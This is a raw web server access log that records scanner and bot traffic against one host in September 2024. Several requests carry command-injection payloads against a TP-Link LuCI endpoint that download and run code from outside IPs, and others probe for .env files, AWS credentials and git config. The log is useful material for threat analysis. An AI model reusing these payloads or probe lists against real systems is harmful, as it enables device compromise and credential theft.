141.255.160.234 - - [04/Sep/2024:03:54:17 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F45.202.35.36%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
89.190.156.137 - - [04/Sep/2024:03:54:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [04/Sep/2024:03:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.211.214 - - [04/Sep/2024:03:56:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [04/Sep/2024:03:59:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [04/Sep/2024:04:01:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
167.94.138.49 - - [04/Sep/2024:04:01:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.49 - - [04/Sep/2024:04:01:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.49 - - [04/Sep/2024:04:01:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.49 - - [04/Sep/2024:04:01:34 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
149.50.103.48 - - [04/Sep/2024:04:02:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [04/Sep/2024:04:03:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.218.206.68 - - [04/Sep/2024:04:06:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
178.211.139.188 - - [04/Sep/2024:04:07:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
184.105.247.194 - - [04/Sep/2024:04:07:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Electron/2.0.18 Safari/537.36"
74.82.47.2 - - [04/Sep/2024:04:08:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
74.82.47.5 - - [04/Sep/2024:04:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
198.235.24.162 - - [04/Sep/2024:04:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
216.218.206.68 - - [04/Sep/2024:04:08:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20060609 Firefox/123.0esr"
185.191.126.213 - - [04/Sep/2024:04:09:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:04:09:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
216.218.206.68 - - [04/Sep/2024:04:09:55 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
184.105.247.194 - - [04/Sep/2024:04:10:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
74.82.47.2 - - [04/Sep/2024:04:11:04 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
74.82.47.5 - - [04/Sep/2024:04:11:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
184.105.247.194 - - [04/Sep/2024:04:11:26 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Electron/2.0.18 Safari/537.36"
95.214.55.138 - - [04/Sep/2024:04:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
74.82.47.2 - - [04/Sep/2024:04:11:40 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
74.82.47.5 - - [04/Sep/2024:04:11:41 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
205.210.31.98 - - [04/Sep/2024:04:12:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.98 - - [04/Sep/2024:04:12:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.173 - - [04/Sep/2024:04:15:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [04/Sep/2024:04:19:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [04/Sep/2024:04:20:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Sep/2024:04:21:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.191.126.213 - - [04/Sep/2024:04:21:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.71.188.22 - - [04/Sep/2024:04:24:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
95.214.55.138 - - [04/Sep/2024:04:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.138.41 - - [04/Sep/2024:04:26:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.41 - - [04/Sep/2024:04:26:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.41 - - [04/Sep/2024:04:26:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.41 - - [04/Sep/2024:04:26:12 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.224.128.59 - - [04/Sep/2024:04:30:43 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.59 - - [04/Sep/2024:04:30:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.47 - - [04/Sep/2024:04:31:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
167.71.188.22 - - [04/Sep/2024:04:32:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
167.71.188.22 - - [04/Sep/2024:04:32:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.86/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
178.211.139.188 - - [04/Sep/2024:04:33:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.3 - - [04/Sep/2024:04:34:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.3 - - [04/Sep/2024:04:34:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [04/Sep/2024:04:36:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [04/Sep/2024:04:36:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Sep/2024:04:37:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
95.214.55.138 - - [04/Sep/2024:04:38:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [04/Sep/2024:04:39:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
89.190.156.137 - - [04/Sep/2024:04:39:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [04/Sep/2024:04:40:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:04:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.241.213 - - [04/Sep/2024:04:41:05 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.88/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
185.180.140.6 - - [04/Sep/2024:04:41:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [04/Sep/2024:04:42:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [04/Sep/2024:04:45:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
89.190.156.137 - - [04/Sep/2024:04:46:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:46:54 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
91.92.241.213 - - [04/Sep/2024:04:46:57 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.89/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
179.43.133.242 - - [04/Sep/2024:04:47:31 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:31 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:31 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:31 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:31 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:31 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:04:47:32 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
95.214.55.138 - - [04/Sep/2024:04:51:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [04/Sep/2024:04:53:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [04/Sep/2024:04:58:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
91.92.241.213 - - [04/Sep/2024:04:58:59 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.85/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
185.191.126.213 - - [04/Sep/2024:04:59:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [04/Sep/2024:04:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.241.213 - - [04/Sep/2024:05:00:58 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.83/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
91.92.241.213 - - [04/Sep/2024:05:01:48 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.82/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /info HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /.env_example HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /web/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [04/Sep/2024:05:02:38 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
91.92.241.213 - - [04/Sep/2024:05:03:01 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.81/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
191.96.150.90 - - [04/Sep/2024:05:03:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [04/Sep/2024:05:03:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [04/Sep/2024:05:03:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [04/Sep/2024:05:03:36 +0200] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
191.96.150.90 - - [04/Sep/2024:05:03:36 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [04/Sep/2024:05:03:37 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [04/Sep/2024:05:03:38 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [04/Sep/2024:05:03:38 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
91.92.241.213 - - [04/Sep/2024:05:03:47 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.86/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
185.224.128.47 - - [04/Sep/2024:05:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
91.92.241.213 - - [04/Sep/2024:05:05:54 +0200] "POST /login.asp HTTP/1.1" 404 314 "http://212.91.246.87/login.asp" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"
95.214.55.138 - - [04/Sep/2024:05:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.128.37 - - [04/Sep/2024:05:08:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
93.174.93.12 - - [04/Sep/2024:05:12:41 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
149.50.103.48 - - [04/Sep/2024:05:13:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [04/Sep/2024:05:14:14 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [04/Sep/2024:05:14:34 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [04/Sep/2024:05:14:48 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
89.190.156.137 - - [04/Sep/2024:05:15:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
93.174.93.12 - - [04/Sep/2024:05:15:37 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [04/Sep/2024:05:16:41 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
